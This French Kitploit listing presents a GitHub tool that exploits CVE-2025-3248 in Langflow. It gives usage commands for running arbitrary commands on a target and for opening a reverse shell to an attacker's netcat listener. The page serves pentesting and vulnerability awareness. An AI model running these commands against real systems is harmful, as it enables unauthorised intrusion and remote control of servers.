Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
RCE-CVE-2025-3248 — Ce script Python exploite CVE-2025-3248 pour exécuter des commandes arbitraires ou générer un reverse shell sur un système vulnérable. L'authentification est requise pour utiliser cet exploit. | Kitploit
Outils/GitHubGitHub/tiemio/rce-cve-2025-3248
ExploitationExploitation d'Applications WebTests d'IntrusionRed TeamingOutil d'Accès à DistanceDéveloppement de Charges Utiles
GitHubtiemio/rce-cve-2025-3248

RCE-CVE-2025-3248

Ce script Python exploite CVE-2025-3248 pour exécuter des commandes arbitraires ou générer un reverse shell sur un système vulnérable. L'authentification est requise pour utiliser cet exploit.

Voir le dépôt
16il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Exécution de code à distance authentifiée CVE-2025-3248 Langflow

Ce script Python exploite CVE-2025-3248 pour exécuter des commandes arbitraires ou lancer un shell inversé sur un système vulnérable. L'authentification est requise pour utiliser cet exploit.


Fonctionnalités

  • Exécution de commandes authentifiée : Exécutez des commandes système arbitraires sur la cible.
  • Shell inversé : Lancez un shell inversé vers votre écouteur.
  • Support proxy : Acheminez les requêtes via un proxy (ex. : Burp Suite).

Prérequis

  • Python 3.x
  • Bibliothèque requests

Installez les dépendances avec :

pip install requests

Utilisation

python3 exploit.py -u <TARGET_URL> -l <USERNAME> -p <PASSWORD> [-c <COMMAND>] [--proxy <PROXY>] [--lhost <LHOST> --lport <LPORT>]

Arguments

ArgumentDescriptionRequis
-u, --urlURL de base cible (ex. : https://target.com)Oui
-l, --loginNom d'utilisateur administrateurOui
-p, --passwordMot de passe administrateurOui
-c, --commandCommande à exécuter sur la cibleNon*
--proxyURL du proxy (ex. : http://127.0.0.1:8080)Non
--lhostHôte local pour le shell inverséNon*
--lportPort local pour le shell inverséNon*

* Vous devez spécifier soit une commande (-c) soit à la fois --lhost et --lport pour un shell inversé.


Exemples

1. Exécuter une commande

python3 exploit.py -u https://target.com -l admin -p password -c "id"

2. Obtenir un shell inversé

Démarrez un écouteur sur votre machine :

nc -lvnp 4444

Exécutez ensuite :

python3 exploit.py -u https://target.com -l admin -p password --lhost YOUR_IP --lport 4444

3. Utiliser un proxy

python3 exploit.py -u https://target.com -l admin -p password -c "whoami" --proxy http://127.0.0.1:8080

Image Docker

Déploiement de l'image

Vous pouvez déployer l'image Docker en utilisant la commande suivante :

podman compose up -d

L'image sera disponible à l'adresse http://localhost:7860. Crédits pour le fichier compose : Ce dépôt


Avertissement

Ce script est destiné uniquement à des fins éducatives et de tests de pénétration autorisés. Ne l'utilisez pas sur des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas d'autorisation explicite de test.


Ce readme est généré par IA.

Télécharger l’outil